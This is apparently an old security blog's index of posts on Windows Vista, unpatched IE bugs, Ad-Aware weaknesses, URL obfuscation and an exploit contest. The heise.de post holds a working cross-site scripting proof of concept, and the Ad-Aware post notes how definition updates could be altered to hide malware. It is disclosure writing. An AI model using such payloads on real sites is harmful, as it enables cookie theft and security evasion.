morph3us.org

Entries tagged as security

Why Windows is less secure than GNU/Linux

  (Wednesday, February 7. 2007)
Read this article and you know it. (o:




Welcome Vista - Goodbye Windows

  (Tuesday, February 6. 2007)
Peter Gutmann wrote a nice paper called "A Cost Analysis of Windows Vista Content Protection" in which he describes Windows Vista's built-in content protection mechanisms and the considerable costs these protections cause.

I'm going to quote several interesting sentences of his paper:
Providing this protection incurs considerable costs in terms of system performance, system stability, technical support overhead, and hardware and software cost. These issues affect not only users of Vista but the entire PC industry, since the effects of the protection measures extend to cover all hardware and software that will ever come into contact with Vista, even if it's not used directly with Vista (for example hardware in a Macintosh computer or on a Linux server)

Continue reading this entry..

Unaddressed DoS vulnerabilities in IE 6 SP2

  (Wednesday, January 31. 2007)
I reported almost all of these DoS vulnerabilities more than a year ago to Microsoft but they are still not fixed..

Note that the offsets where the browser crashes have changed because of the installed security updates.

Continue reading this entry..

How-to fake heise news entries

  (Tuesday, September 5. 2006)
As I already mentioned in a previous blog posting titled "XSS on heise.de", there was an XSS vulnerability on heise.de. I informed heise's webmaster about this bug on December 23, 2005 and received a reply which stated that this issue was addressed on January 06, 2006. It's almost unbelievable that this bug is still present to this day.

Continue reading this entry..

Why Ad-Aware sucks as hell..

  (Thursday, June 15. 2006)
1. Definition file
 1.1. "Encrypted" with xor
 1.2. Packed with ZIP with simple password
 1.3. No checksum in the def file
      (1.1 to 1.3 together: trivial to intercept def updates
      and change the defs to make the malware invisible)
 1.4. Big redundancy in the def file
 1.5. Multiplying the number of entries in the def file with constant 1.46
      to make it look like it has more definitions

2. Program
 2.1. Poorly written checksum algo
 2.2. Poorly written scanning algo (slow as hell)
 2.3. CSI works only for in-memory images and is useless

You want the proofs? Read the following text ...


https://rootkit.com/newsread.php?newsid=471

Dotless IP addresses and URL Obfuscation

  (Wednesday, March 8. 2006)
First of all, I should explain what "dotless IP addresses" are because I think this term is not very common. Simply put, this is an address which does not consist of octets separated by dots. You may ask how to convert an IP address into a dotless one..

In fact there are several different methods to convert an IP address into a dotless one and there are many more ways to obfuscate a URL, but not all of them work in every browser.

Here are some examples, in which I'll use the domain 'buha.info' for demonstration purposes:

Continue reading this entry..

BuHa ExploitMe Contest

  (Tuesday, March 7. 2006)
The BuHa ExploitMe Contest is organized in multiple levels with increasing difficulty. In each of these levels you'll find an exploitable ANSI C program and a short hint about the kind of shellcode which should be used. The first and the second level do not require the usage of any shellcode, so that people who are not familiar with security-related bugs in C programs can complete them too.

The contest started almost a week ago and so far there are 19 different participants. I was surprised by three Brazilian guys who are also taking part in the contest and found the contest site with Google.

Check it out: https://www.buha.info/projects/exploitme-contest/


XSS on heise.de

  (Tuesday, January 3. 2006)
heise.de - a German news site for, amongst others, security related topics - is vulnerable to XSS (Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23 but I did not receive an answer and the XSS vulnerability is still not addressed.

PoC:
<form method="post" action="http://www.heise.de/registration/"
  name="heise">
  <input type="text" name="uid" size="20" value=''>
  <input type="text" name="vorname" size="20"
 value='"><script>alert(document.cookie)</script>'>
  <input type="text" name="name" size="20"
 value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">

heise-xss-poc.txt

UPDATE: 2006-01-09: 20:26
Hello Mr. Waldegger,

thank you very much for your report. Due to the holidays, the fix unfortunately took somewhat longer.

Kind regards,
heise online
Webmaster

Gmail Account Hijacking Vulnerability

  (Thursday, December 22. 2005)
There was a vulnerability in Google's Gmail service which allowed an attacker to take control of an arbitrary mail account without requiring any cookie theft. According to the person who spotted the bug, the vulnerability was fixed by Google on October 18.

http://www.elhacker.net/gmailbug/english_version.htm

MS05-053 - 896424

  (Friday, November 11. 2005)
M$ released the Bulletin MS05-053 to resolve some lately discovered vulnerabilities in the rendering of the Windows Metafile (WMF) and Enhanced Metafile (EMF) image formats. See CAN-2005-2123, CAN-2005-2124 and EMF file DOS vulnerability for details.

Therefore I updated the update pack for Windoze XP SP2..